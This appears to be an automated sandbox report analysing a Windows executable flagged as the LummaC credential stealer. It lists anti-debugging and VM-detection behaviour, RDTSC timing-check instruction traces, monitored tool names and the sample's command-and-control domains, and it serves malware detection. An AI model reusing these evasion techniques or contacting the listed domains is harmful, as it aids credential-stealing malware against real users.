    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EAC7 second address: A2EAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EAD1 second address: A2EAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7D9 second address: A3A7DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36F31 second address: A36F3E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36F3E second address: A36F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49E6D second address: A49E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63592 second address: A6359E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDACAD5286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6359E second address: A635AD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FDAh 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A635AD second address: A635C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FDDACAD5286h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A635C0 second address: A635D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62280 second address: A622B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Eh 0x00000009 jmp 00007FDDACAD528Ah 0x0000000e popad 0x0000000f jmp 00007FDDACAD5294h 0x00000014 pop edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A622B9 second address: A622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6243C second address: A62440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62440 second address: A6246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDDACF47FDEh 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FDDACF47FDDh 0x00000014 pop ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A625C2 second address: A625C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6277B second address: A62785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62913 second address: A62931 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACAD5296h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62D1C second address: A62D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62D20 second address: A62D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6305D second address: A63065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A631C0 second address: A631C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A631C4 second address: A631F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACF47FE3h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A631F9 second address: A631FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A631FD second address: A63207 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63207 second address: A63214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FDDACAD5286h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63214 second address: A6321F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A675AE second address: A675B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67780 second address: A677C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDDACF47FE1h 0x0000000f nop 0x00000010 mov dx, AF39h 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2ACAh] 0x0000001c push 2F0630A1h 0x00000021 jl 00007FDDACF47FE0h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67AD6 second address: A67ADC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67ADC second address: A67B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FDDACF47FD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jo 00007FDDACF47FDCh 0x00000016 jnl 00007FDDACF47FD6h 0x0000001c pushad 0x0000001d jmp 00007FDDACF47FDDh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67B08 second address: A67B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FDDACAD5299h 0x00000010 ja 00007FDDACAD528Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDDACAD5294h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67B51 second address: A67B56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D32 second address: A68D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D36 second address: A68D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D3A second address: A68D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5299h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D62 second address: A68D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnp 00007FDDACF47FD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A56F second address: A6A575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0C93 second address: 4EA0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 sub ax, D8DEh 0x0000000e jmp 00007FDDACF47FE9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0CCF second address: 4EA0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test ecx, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD5296h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0CF2 second address: 4EA0D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0D01 second address: 4EA0D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0D07 second address: 4EA0D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0D0B second address: 4EA0DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FDDACAD52D4h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDDACAD5294h 0x00000018 and esi, 51BCDD98h 0x0000001e jmp 00007FDDACAD528Bh 0x00000023 popfd 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 add eax, ecx 0x0000002a pushad 0x0000002b push ebx 0x0000002c mov bx, cx 0x0000002f pop esi 0x00000030 jmp 00007FDDACAD5299h 0x00000035 popad 0x00000036 mov eax, dword ptr [eax+00000860h] 0x0000003c jmp 00007FDDACAD528Eh 0x00000041 test eax, eax 0x00000043 pushad 0x00000044 mov bh, ah 0x00000046 mov edx, 7F0CE86Eh 0x0000004b popad 0x0000004c je 00007FDE1D6AB256h 0x00000052 pushad 0x00000053 mov di, 9746h 0x00000057 pushad 0x00000058 call 00007FDDACAD5299h 0x0000005d pop eax 0x0000005e popad 0x0000005f popad 0x00000060 test byte ptr [eax+04h], 00000005h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 pushfd 0x0000006a jmp 00007FDDACAD5296h 0x0000006f sbb ecx, 28190648h 0x00000075 jmp 00007FDDACAD528Bh 0x0000007a popfd 0x0000007b popad 0x0000007c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987471 second address: 987475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0073 second address: 4EC0083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0083 second address: 4EC00AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACF47FE0h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00AB second address: 4EC00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00BA second address: 4EC00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00C0 second address: 4EC00C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7E3913 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 982EE5 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FF3D2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5644Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.drBinary or memory string: VMware
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000002.2266194355.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266194355.000000000115E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.2261714397.000000000095A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: mpProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
